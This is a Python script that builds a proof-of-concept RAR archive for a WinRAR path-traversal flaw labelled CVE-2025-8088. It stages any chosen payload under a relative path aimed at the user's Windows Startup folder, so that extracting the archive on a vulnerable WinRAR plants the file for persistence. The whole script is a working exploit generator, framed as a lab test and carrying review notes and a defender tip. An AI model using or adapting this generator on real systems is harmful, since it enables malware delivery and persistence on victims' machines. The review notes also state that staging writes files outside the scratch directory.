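"""Build a lab proof-of-concept RAR for the WinRAR path-traversal issue CVE-2025-8088.

The CVE number and the "< 7.13" vulnerable range are taken from this script's
own messages; nothing in the script verifies them.

For defenders: an archive extraction that creates a file in a per-user Startup
folder is a persistence indicator worth alerting on.
"""
import argparse
import os
import shutil
import subprocess
from pathlib import Path


def create_traversal_rar(payload_path, output_rar):
    """Stage ``payload_path`` under a traversal-style name and archive it with rar.exe.

    Inputs are validated before any filesystem change, so a wrong payload path
    or a missing WinRAR install no longer wipes an existing ``rar_temp``
    directory or leaves a half-built staging tree behind.

    Args:
        payload_path: Path to the file to embed. Only its basename is used for
            the name inside the staged tree.
        output_rar: Path handed to rar.exe as the archive name. rar.exe runs
            with its working directory set to ``rar_temp``, so a relative
            value is interpreted relative to that directory.

    Raises:
        FileNotFoundError: If the payload or rar.exe does not exist.
        subprocess.CalledProcessError: If rar.exe exits with a non-zero status.
    """
    # Path to WinRAR's CLI tool
    WINRAR_PATH = r"C:\Program Files\WinRAR\rar.exe"  # Change if different

    # Fail fast, before the destructive rmtree() below.
    if not Path(payload_path).is_file():
        raise FileNotFoundError(f"payload file not found: {payload_path}")
    if not Path(WINRAR_PATH).is_file():
        raise FileNotFoundError(f"rar.exe not found at: {WINRAR_PATH}")

    # Relative traversal path inside the archive
    TRAVERSAL_PATH = r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\" + os.path.basename(payload_path)

    # Scratch directory in the current working directory.
    # NOTE(review): an existing ./rar_temp is deleted wholesale, whatever it holds.
    temp_dir = Path.cwd() / "rar_temp"
    if temp_dir.exists():
        shutil.rmtree(temp_dir)
    temp_dir.mkdir(parents=True, exist_ok=True)

    # NOTE(review): TRAVERSAL_PATH contains ".." components, so on Windows this
    # joined path resolves two levels above rar_temp. The mkdir and copy below
    # therefore write outside the scratch directory, on the machine running
    # this script.
    target_path = temp_dir / TRAVERSAL_PATH
    target_path.parent.mkdir(parents=True, exist_ok=True)

    # Copy payload to target location
    shutil.copy(payload_path, target_path)

    # Argument list, no shell: user-supplied paths are never parsed by cmd.exe.
    # NOTE(review): the script never inspects the archive it produces, so the
    # statements printed below are the author's claims, not verified results.
    cmd = [
        WINRAR_PATH,
        "a",
        "-ep",
        str(output_rar),
        str(TRAVERSAL_PATH),
    ]
    # check=True turns a non-zero rar.exe exit status into CalledProcessError.
    subprocess.run(cmd, cwd=temp_dir, check=True)

    print(f"[+] Created PoC RAR: {output_rar}")
    print("[!] Test ONLY in a lab with vulnerable WinRAR (< 7.13).")
    print("[!] On extraction, the file will be placed in the user's Startup folder.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Safe PoC for CVE-2025-8088 path traversal in WinRAR")
    parser.add_argument("-p", "--payload", required=True, help="Path to harmless file to embed (e.g., calc.exe)")
    parser.add_argument("-o", "--output", required=True, help="Path to save the output RAR")
    args = parser.parse_args()

    create_traversal_rar(args.payload, args.output)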